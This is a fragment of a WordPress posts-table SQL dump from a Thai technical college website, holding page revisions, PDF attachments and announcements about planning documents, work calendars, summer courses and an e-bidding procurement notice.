(1708, 3, '2018-03-08 15:05:15', '2018-03-08 08:05:15', '<img class=\"aligncenter size-full wp-image-1632\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-34-46.jpg\" alt=\"\" width=\"193\" height=\"246\" />\r\n\r\n<img class=\"aligncenter wp-image-1633\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-27-300x82.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1654\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-24-55-240x300.jpg\" alt=\"\" width=\"240\" height=\"300\" />\r\n<h3><a href=\"/ข้อมูลงบประมาณ61\"><span style=\"color: #ff0000;\">--->ข้อมูลงบประมาณ ปีงบประมาณ 2561<---</span></a></h3>\r\n<h4><a href=\"/แผนปฏิบัติราชการ\"><span style=\"color: #ff6600;\">** แผนปฏิบัติราชการ</span></a></h4>\r\n<h4><a href=\"/แผนพัฒนาสถานศึกษา\"><span style=\"color: #ff6600;\">** แผนพัฒนาสถานศึกษา </span></a></h4>\r\n<h4><a href=\"/แผนโครงการกิจกรรมชมรมว\"><span style=\"color: #ff6600;\">** แผนโครงการกิจกรรมชมรมวิชาชีพ กิจกรรมองค์การวิชาชีพ </span></a></h4>\r\n<h4><span style=\"color: #ff00ff;\">** รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ</span></h4>\r\n<h4><span style=\"color: #339966;\">** ปฏิทินปฏิบัติงาน</span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.งาน-1-1.doc\">** แบบฟอร์ม สผ.งาน</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.แผนก-1-1.doc\">** แบบฟอร์ม สผ.แผนก</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มโครงการ.xls\">** แบบฟอร์มโครงการ</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มรายงานผลการปฏิบัติงานตามแผนปฏิบัติการ.xls\">** แบบฟอร์มรายงานผลการปฏิบัติงานตามแผนปฏิบัติการ</a></span></h4>\r\n<h4></h4>\r\n \r\n\r\n \r\n\r\n ', 'งานวางแผนและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1659-revision-v1', '', '', '2018-03-08 15:05:15', '2018-03-08 08:05:15', '', 1659, 'http://www.technicrayong.ac.th/1659-revision-v1/', 0, 'revision', '', 0),
(1709, 3, '2018-03-08 15:05:18', '2018-03-08 08:05:18', '<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1631 \" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-06.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<a href=\"/งานวางแผนและความร่วมมื\"><img class=\"aligncenter wp-image-1632 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-34-46.jpg\" alt=\"\" width=\"193\" height=\"246\" /></a>\r\n\r\n<a href=\"/งานวางแผนและความร่วมมื\"><img class=\"aligncenter wp-image-1633\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-27.jpg\" alt=\"\" width=\"375\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1654 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-24-55.jpg\" alt=\"\" width=\"246\" height=\"308\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1635\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-12-300x79.jpg\" alt=\"\" width=\"376\" height=\"99\" />\r\n\r\n<img class=\"aligncenter wp-image-1655 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-25-12.jpg\" alt=\"\" width=\"306\" height=\"334\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1638\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-01.jpg\" alt=\"\" width=\"194\" height=\"241\" />\r\n\r\n<img class=\"aligncenter wp-image-1639\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-18-300x80.jpg\" alt=\"\" width=\"376\" height=\"100\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1656\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-25-57-221x300.jpg\" alt=\"\" width=\"221\" height=\"300\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1642\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-57-37.jpg\" alt=\"\" width=\"202\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1643\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-53-30-300x81.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1657\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-26-35-223x300.jpg\" alt=\"\" width=\"223\" height=\"300\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1646\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-21.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1647\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-34-300x80.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1648 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-05-03.jpg\" alt=\"\" width=\"506\" height=\"323\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1652\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-22-50.jpg\" alt=\"\" width=\"191\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1650\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-21-54-300x81.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1651 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-21-30.jpg\" alt=\"\" width=\"543\" height=\"317\" />\r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายแผนงานและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1588-revision-v1', '', '', '2018-03-08 15:05:18', '2018-03-08 08:05:18', '', 1588, 'http://www.technicrayong.ac.th/1588-revision-v1/', 0, 'revision', '', 0),
(1710, 3, '2018-03-08 15:10:51', '2018-03-08 08:10:51', '<h3><a href=\"/%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%97%e0%b8%b4%e0%b8%99%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%88%e0%b8%b3-2/\"><strong><span style=\"color: #008000;\">-->ปฏิทินปฏิบัติงาน ประจำปีการศึกษา 2563<--</span></strong></a></h3>\r\n<h4><a href=\"/%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%97%e0%b8%b4%e0%b8%99%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%88%e0%b8%b3%e0%b8%9b/\"><span style=\"color: #008000;\">-->ปฏิทินปฏิบัติงาน ประจำปีการศึกษา 2562<--</span></a></h4>\r\n<h4><span style=\"color: #008000;\"><a style=\"color: #008000;\" href=\"/wp-content/uploads/2018/12/ปฏิทินปฏิบัติงาน-2561.pdf\">-->ปฏิทินปฏิบัติงาน ประจำปีการศึกษา</a></span><span style=\"color: #008000;\"><a style=\"color: #008000;\" href=\"/wp-content/uploads/2018/12/ปฏิทินปฏิบัติงาน-2561.pdf\"> 2561<--</a></span></h4>\r\n<h4><span style=\"color: #008000;\"><a style=\"color: #008000;\" href=\"/wp-content/uploads/2018/06/ปฏิทินปฏิบัติงาน-ประจำปีการศึกษา-2560.pdf\">-->ปฏิทินปฏิบัติงาน ประจำปีการศึกษา 2560<--</a></span></h4>\r\n<h4><span style=\"color: #008000;\"><a style=\"color: #008000;\" href=\"/wp-content/uploads/2018/03/ปฏิทินปฏิบัติงานปีการศึกษา-2559.pdf\">-->ปฏิทินปฏิบัติงาน ประจำปีการศึกษา 2559<--</a></span></h4>\r\n<h4><span style=\"color: #008000;\"><a style=\"color: #008000;\" href=\"/wp-content/uploads/2018/03/ปฏิทินปฏิบัติงาน2558.pdf\">-->ปฏิทินปฏิบัติงาน ประจำปีการศึกษา 2558<--</a></span></h4>\r\n<h4><span style=\"color: #008000;\"><a style=\"color: #008000;\" href=\"/wp-content/uploads/2018/03/ปฏิทินปี-57.pdf\">-->ปฏิทินปฏิบัติงาน ประจำปีการศึกษา 2557<--</a></span></h4>', 'ปฏิทินปฏิบัติงาน', '', 'publish', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%97%e0%b8%b4%e0%b8%99%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99', '', '', '2021-03-23 15:32:54', '2021-03-23 08:32:54', '', 0, 'http://www.technicrayong.ac.th/?page_id=1710', 0, 'page', '', 0),
(1711, 3, '2018-03-08 15:06:56', '2018-03-08 08:06:56', '', 'ปฏิทินปฏิบัติงาน2558', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%97%e0%b8%b4%e0%b8%99%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%992558', '', '', '2018-03-08 15:06:56', '2018-03-08 08:06:56', '', 1710, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/ปฏิทินปฏิบัติงาน2558.pdf', 0, 'attachment', 'application/pdf', 0),
(1712, 3, '2018-03-08 15:07:22', '2018-03-08 08:07:22', '', 'ปฏิทินปฏิบัติงานปีการศึกษา 2559', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%97%e0%b8%b4%e0%b8%99%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9b%e0%b8%b5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a8', '', '', '2018-03-08 15:07:22', '2018-03-08 08:07:22', '', 1710, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/ปฏิทินปฏิบัติงานปีการศึกษา-2559.pdf', 0, 'attachment', 'application/pdf', 0),
(1713, 3, '2018-03-08 15:07:30', '2018-03-08 08:07:30', '', 'ปฏิทินปี 57', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%97%e0%b8%b4%e0%b8%99%e0%b8%9b%e0%b8%b5-57', '', '', '2018-03-08 15:07:30', '2018-03-08 08:07:30', '', 1710, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/ปฏิทินปี-57.pdf', 0, 'attachment', 'application/pdf', 0),
(1714, 3, '2018-03-08 15:10:51', '2018-03-08 08:10:51', '<h4><span style=\"color: #008000;\"><a style=\"color: #008000;\" href=\"/wp-content/uploads/2018/03/ปฏิทินปี-57.pdf\">-->ปฏิทินปฏิบัติงาน ประจำปีการศึกษา 2557<--</a></span></h4>\r\n<h4><span style=\"color: #008000;\"><a style=\"color: #008000;\" href=\"/wp-content/uploads/2018/03/ปฏิทินปฏิบัติงาน2558.pdf\">-->ปฏิทินปฏิบัติงาน ประจำปีการศึกษา 2558<--</a></span></h4>\r\n<h4><span style=\"color: #008000;\"><a style=\"color: #008000;\" href=\"/wp-content/uploads/2018/03/ปฏิทินปฏิบัติงานปีการศึกษา-2559.pdf\">-->ปฏิทินปฏิบัติงาน ประจำปีการศึกษา 2559<--</a></span></h4>', 'ปฏิทินปฏิบัติงาน', '', 'inherit', 'closed', 'closed', '', '1710-revision-v1', '', '', '2018-03-08 15:10:51', '2018-03-08 08:10:51', '', 1710, 'http://www.technicrayong.ac.th/1710-revision-v1/', 0, 'revision', '', 0),
(1716, 3, '2018-03-08 15:12:13', '2018-03-08 08:12:13', '<img class=\"aligncenter size-full wp-image-1632\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-34-46.jpg\" alt=\"\" width=\"193\" height=\"246\" />\r\n\r\n<img class=\"aligncenter wp-image-1633\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-27-300x82.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1654\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-24-55-240x300.jpg\" alt=\"\" width=\"240\" height=\"300\" />\r\n<h3><a href=\"/ข้อมูลงบประมาณ61\"><span style=\"color: #ff0000;\">--->ข้อมูลงบประมาณ ปีงบประมาณ 2561<---</span></a></h3>\r\n<h4><a href=\"/แผนปฏิบัติราชการ\"><span style=\"color: #ff6600;\">** แผนปฏิบัติราชการ</span></a></h4>\r\n<h4><a href=\"/แผนพัฒนาสถานศึกษา\"><span style=\"color: #ff6600;\">** แผนพัฒนาสถานศึกษา </span></a></h4>\r\n<h4><a href=\"/แผนโครงการกิจกรรมชมรมว\"><span style=\"color: #ff6600;\">** แผนโครงการกิจกรรมชมรมวิชาชีพ กิจกรรมองค์การวิชาชีพ </span></a></h4>\r\n<h4><span style=\"color: #ff00ff;\">** รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ</span></h4>\r\n<h4><a href=\"http://www.technicrayong.ac.th/ปฏิทินปฏิบัติงาน\"><span style=\"color: #008000;\">** ปฏิทินปฏิบัติงาน</span></a></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.งาน-1-1.doc\">** แบบฟอร์ม สผ.งาน</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.แผนก-1-1.doc\">** แบบฟอร์ม สผ.แผนก</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มโครงการ.xls\">** แบบฟอร์มโครงการ</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มรายงานผลการปฏิบัติงานตามแผนปฏิบัติการ.xls\">** แบบฟอร์มรายงานผลการปฏิบัติงานตามแผนปฏิบัติการ</a></span></h4>\r\n<h4></h4>\r\n \r\n\r\n \r\n\r\n ', 'งานวางแผนและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1659-revision-v1', '', '', '2018-03-08 15:12:13', '2018-03-08 08:12:13', '', 1659, 'http://www.technicrayong.ac.th/1659-revision-v1/', 0, 'revision', '', 0),
(1719, 1, '2018-03-09 09:28:29', '2018-03-09 02:28:29', '<h1 style=\"text-align: center;\"><span style=\"color: #0000ff;\">ประกาศรายชื่อผู้มีสิทธิ์สอบ</span></h1>\r\n \r\n<h2 style=\"text-align: center;\"><a href=\"https://goo.gl/RGU4eU\" target=\"_blank\" rel=\"noopener\"><span style=\"color: #ff0000;\">กดเพื่อเปิดดู</span></a></h2>\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-807 size-full\" src=\"/wp-content/uploads/2018/01/27024291_535295693513290_2564198707510501767_o.jpg\" alt=\"\" width=\"2498\" height=\"656\" />\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_01.png\"><img class=\"aligncenter size-large wp-image-1007\" src=\"/wp-content/uploads/2018/01/201802061754_Page_01-688x1024.png\" alt=\"\" width=\"640\" height=\"953\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_02.png\"><img class=\"aligncenter size-large wp-image-1008\" src=\"/wp-content/uploads/2018/01/201802061754_Page_02-694x1024.png\" alt=\"\" width=\"640\" height=\"944\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_03.png\"><img class=\"aligncenter size-large wp-image-1009\" src=\"/wp-content/uploads/2018/01/201802061754_Page_03-690x1024.png\" alt=\"\" width=\"640\" height=\"950\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_04.png\"><img class=\"aligncenter size-large wp-image-1010\" src=\"/wp-content/uploads/2018/01/201802061754_Page_04-690x1024.png\" alt=\"\" width=\"640\" height=\"950\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_05.png\"><img class=\"aligncenter size-large wp-image-1011\" src=\"/wp-content/uploads/2018/01/201802061754_Page_05-685x1024.png\" alt=\"\" width=\"640\" height=\"957\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_06.png\"><img class=\"aligncenter size-large wp-image-1012\" src=\"/wp-content/uploads/2018/01/201802061754_Page_06-735x1024.png\" alt=\"\" width=\"640\" height=\"892\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_07.png\"><img class=\"aligncenter size-large wp-image-1013\" src=\"/wp-content/uploads/2018/01/201802061754_Page_07-687x1024.png\" alt=\"\" width=\"640\" height=\"954\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_08.png\"><img class=\"aligncenter size-large wp-image-1014\" src=\"/wp-content/uploads/2018/01/201802061754_Page_08-690x1024.png\" alt=\"\" width=\"640\" height=\"950\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_09.png\"><img class=\"aligncenter size-large wp-image-1015\" src=\"/wp-content/uploads/2018/01/201802061754_Page_09-688x1024.png\" alt=\"\" width=\"640\" height=\"953\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_10.png\"><img class=\"aligncenter size-large wp-image-1016\" src=\"/wp-content/uploads/2018/01/201802061754_Page_10-700x1024.png\" alt=\"\" width=\"640\" height=\"936\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_11.png\"><img class=\"aligncenter size-large wp-image-1017\" src=\"/wp-content/uploads/2018/01/201802061754_Page_11-681x1024.png\" alt=\"\" width=\"640\" height=\"962\" /></a>', 'วิทยาลัยเทคนิคระยองเปิดรับสมัคร นักเรียน นักศึกษา ปีการศึกษา 2561 หลักสูตร ปวช. ,ปวส. และปริญญาตรี', '', 'inherit', 'closed', 'closed', '', '806-revision-v1', '', '', '2018-03-09 09:28:29', '2018-03-09 02:28:29', '', 806, 'http://www.technicrayong.ac.th/806-revision-v1/', 0, 'revision', '', 0),
(1721, 4, '2018-03-10 16:43:36', '2018-03-10 09:43:36', 'เพื่อให้นักเรียน ปวช.3 นักศึกษาปวส.2 ที่ เรียนไม่ผ่านภาคเรียน 2/2560 วิทยาลัยเทคนิคระยองขอประกาศ\r\n\r\nรายวิชาภาคฤดูร้อนเพิ่มเติม (เรียนระหว่างวันที่ 12 มีนาคม 2561 ถึง 5 เมษายน 2561) ให้นักเรียนนักศึกษา\r\n\r\nลงทะเบียนวันที่ 12-13 มีนาคม 2561\r\n\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F03%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B9%80%E0%B8%9B%E0%B8%B4%E0%B8%94%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%A0%E0%B8%B2%E0%B8%84%E0%B8%A4%E0%B8%94%E0%B8%B9%E0%B8%A3%E0%B9%89%E0%B8%AD%E0%B8%99-2560-%E0%B9%80%E0%B8%9E%E0%B8%B4%E0%B9%88%E0%B8%A1%E0%B9%80%E0%B8%95%E0%B8%B4%E0%B8%A1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n\r\n ', 'ประกาศการเปิดการเรียนการสอนภาคฤดูร้อน(เพิ่มเติม)', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%9b%e0%b8%b4%e0%b8%94%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%81', '', '', '2018-03-10 16:47:41', '2018-03-10 09:47:41', '', 0, 'http://www.technicrayong.ac.th/?p=1721', 456, 'post', '', 0),
(1722, 4, '2018-03-10 16:43:36', '2018-03-10 09:43:36', 'เพื่อให้นักเรียน ปวช.3 นักศึกษาปวส.2 ที่ เรียนไม่ผ่านภาคเรียน 2/2560 วิทยาลัยเทคนิคระยองขอประกาศ\r\n\r\nรายวิชาภาคฤดูร้อนเพิ่มเติม (เรียนระหว่างวันที่ 12 มีนาคม 2561 ถึง 5 เมษายน 2561) ให้นักเรียนนักศึกษา\r\n\r\nลงทะเบียนวันที่ 12-13 มีนาคม 2561\r\n\r\n ', 'ประกาศการเปิดการเรียนการสอนภาคฤดูร้อน(เพิ่มเติม)', '', 'inherit', 'closed', 'closed', '', '1721-revision-v1', '', '', '2018-03-10 16:43:36', '2018-03-10 09:43:36', '', 1721, 'http://www.technicrayong.ac.th/1721-revision-v1/', 0, 'revision', '', 0),
(1723, 4, '2018-03-10 16:45:20', '2018-03-10 09:45:20', '', 'ประกาศรายชื่อวิชาที่เปิดสอนภาคฤดูร้อน 2560 (เพิ่มเติม)', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%97%e0%b8%b5%e0%b9%88%e0%b9%80%e0%b8%9b', '', '', '2018-03-10 16:45:20', '2018-03-10 09:45:20', '', 1721, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/ประกาศรายชื่อวิชาที่เปิดสอนภาคฤดูร้อน-2560-เพิ่มเติม.pdf', 0, 'attachment', 'application/pdf', 0),
(1724, 4, '2018-03-10 16:46:10', '2018-03-10 09:46:10', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F03%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B9%80%E0%B8%9B%E0%B8%B4%E0%B8%94%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%A0%E0%B8%B2%E0%B8%84%E0%B8%A4%E0%B8%94%E0%B8%B9%E0%B8%A3%E0%B9%89%E0%B8%AD%E0%B8%99-2560-%E0%B9%80%E0%B8%9E%E0%B8%B4%E0%B9%88%E0%B8%A1%E0%B9%80%E0%B8%95%E0%B8%B4%E0%B8%A1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]เพื่อให้นักเรียน ปวช.3 นักศึกษาปวส.2 ที่ เรียนไม่ผ่านภาคเรียน 2/2560 วิทยาลัยเทคนิคระยองขอประกาศ\n\nรายวิชาภาคฤดูร้อนเพิ่มเติม (เรียนระหว่างวันที่ 12 มีนาคม 2561 ถึง 5 เมษายน 2561) ให้นักเรียนนักศึกษา\n\nลงทะเบียนวันที่ 12-13 มีนาคม 2561\n\n ', 'ประกาศการเปิดการเรียนการสอนภาคฤดูร้อน(เพิ่มเติม)', '', 'inherit', 'closed', 'closed', '', '1721-autosave-v1', '', '', '2018-03-10 16:46:10', '2018-03-10 09:46:10', '', 1721, 'http://www.technicrayong.ac.th/1721-autosave-v1/', 0, 'revision', '', 0),
(1725, 4, '2018-03-10 16:46:32', '2018-03-10 09:46:32', 'เพื่อให้นักเรียน ปวช.3 นักศึกษาปวส.2 ที่ เรียนไม่ผ่านภาคเรียน 2/2560 วิทยาลัยเทคนิคระยองขอประกาศ\r\n\r\nรายวิชาภาคฤดูร้อนเพิ่มเติม (เรียนระหว่างวันที่ 12 มีนาคม 2561 ถึง 5 เมษายน 2561) ให้นักเรียนนักศึกษา\r\n\r\nลงทะเบียนวันที่ 12-13 มีนาคม 2561\r\n\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F03%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B9%80%E0%B8%9B%E0%B8%B4%E0%B8%94%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%A0%E0%B8%B2%E0%B8%84%E0%B8%A4%E0%B8%94%E0%B8%B9%E0%B8%A3%E0%B9%89%E0%B8%AD%E0%B8%99-2560-%E0%B9%80%E0%B8%9E%E0%B8%B4%E0%B9%88%E0%B8%A1%E0%B9%80%E0%B8%95%E0%B8%B4%E0%B8%A1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n\r\n ', 'ประกาศการเปิดการเรียนการสอนภาคฤดูร้อน(เพิ่มเติม)', '', 'inherit', 'closed', 'closed', '', '1721-revision-v1', '', '', '2018-03-10 16:46:32', '2018-03-10 09:46:32', '', 1721, 'http://www.technicrayong.ac.th/1721-revision-v1/', 0, 'revision', '', 0),
(1727, 3, '2018-03-12 09:44:08', '2018-03-12 02:44:08', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F03%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%94%E0%B9%89%E0%B8%A7%E0%B8%A2%E0%B8%A7%E0%B8%B4%E0%B8%98%E0%B8%B5%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%AD%E0%B8%B4%E0%B9%80%E0%B8%A5%E0%B9%87%E0%B8%81%E0%B8%97%E0%B8%A3%E0%B8%AD%E0%B8%99%E0%B8%B4%E0%B8%81%E0%B8%AA%E0%B9%8C-e-bidding.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n\r\n ', 'ประกาศ ประกวดราคาซื้อด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding) จำนวน 4 รายการ', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%8b%e0%b8%b7%e0%b9%89%e0%b8%ad%e0%b8%94%e0%b9%89', '', '', '2018-03-12 09:44:08', '2018-03-12 02:44:08', '', 0, 'http://www.technicrayong.ac.th/?p=1727', 455, 'post', '', 0),
(1728, 3, '2018-03-12 09:31:45', '2018-03-12 02:31:45', '', 'ประกวดราคาซื้อด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%8b%e0%b8%b7%e0%b9%89%e0%b8%ad%e0%b8%94%e0%b9%89%e0%b8%a7%e0%b8%a2%e0%b8%a7%e0%b8%b4%e0%b8%98%e0%b8%b5', '', '', '2018-03-12 09:31:45', '2018-03-12 02:31:45', '', 1727, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/ประกวดราคาซื้อด้วยวิธีประกวดราคาอิเล็กทรอนิกส์-e-bidding.pdf', 0, 'attachment', 'application/pdf', 0),
